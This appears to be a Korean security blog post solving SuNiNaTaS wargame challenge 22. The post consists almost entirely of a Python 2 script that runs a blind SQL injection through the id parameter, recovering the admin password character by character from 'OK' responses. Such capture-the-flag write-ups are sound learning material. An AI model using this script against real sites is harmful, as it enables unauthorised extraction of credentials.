Notice
Recent Posts
Recent Comments
Link
| 일 | 월 | 화 | 수 | 목 | 금 | 토 |
|---|---|---|---|---|---|---|
| 1 | 2 | 3 | ||||
| 4 | 5 | 6 | 7 | 8 | 9 | 10 |
| 11 | 12 | 13 | 14 | 15 | 16 | 17 |
| 18 | 19 | 20 | 21 | 22 | 23 | 24 |
| 25 | 26 | 27 | 28 | 29 | 30 | 31 |
Tags
- 칼리 게스트확장
- Browser xss
- ie xss
- x-frame-options bypass
- suninatas
- 보안헤더
- Kali Linux
- 칼리
- 교차 사이트
- firefox xss
- xss vector
- XSS
- XSS filter disable
- chome xss
- 칼리 한글
- wargame
- Cross Site Script
- X-Frame-Options
- filter disable
- cross-site scripting
- kali
- SSRF
- 이벤트 핸들러
- event handler
- 파일 확장자
- xss cheat sheet
- Server-Side Request Forgery
- xss attack
- security disable
- filename extension
Archives
- Today
- Total
oioi
suninatas 22 본문
suninatas 22번 문제
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 | import requests session = requests.Session() #word wordlist = "abcdefghijklmnopqrstuvwzyzABCDEFGHIJKLMNOPQRSTUVWXYZ1234567890~!@#$%^&*()_+" answer= "" for i in range(10): for j in range(len(wordlist)): #print "admin' and (substring(pw,"+str(i+1)+",1)='"+wordlist[j]+"')--" headers = {"Accept":"text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8","Upgrade-Insecure-Requests":"1","User-Agent":"Mozilla/5.0 (iPhone; CPU iPhone OS 11_0_1 like Mac OS X) AppleWebKit/604.1.38 (KHTML, like Gecko) Version/11.0 Mobile/15A402 Safari/604.1","Referer":"http://suninatas.com/Part_one/web22/web22.asp","Connection":"close","Accept-Language":"ko-KR"} cookies = {"ASPSESSIONIDSAADDQAR":"_Your Cookie_"} paramsGet = {"pw":"aaaaa","id":"admin'and(substring(pw,"+str(i+1)+",1)='"+wordlist[j]+"')--"} response = session.get("http://suninatas.com/Part_one/web22/web22.asp", params=paramsGet, headers=headers, cookies=cookies) p = 'OK' if response.content.find(p) != -1: print wordlist[j] answer+=wordlist[j] print("answer: %s" % answer) #print("Status code: %i" % response.status_code) #print("Response body: %s" % response.content) | cs |
Comments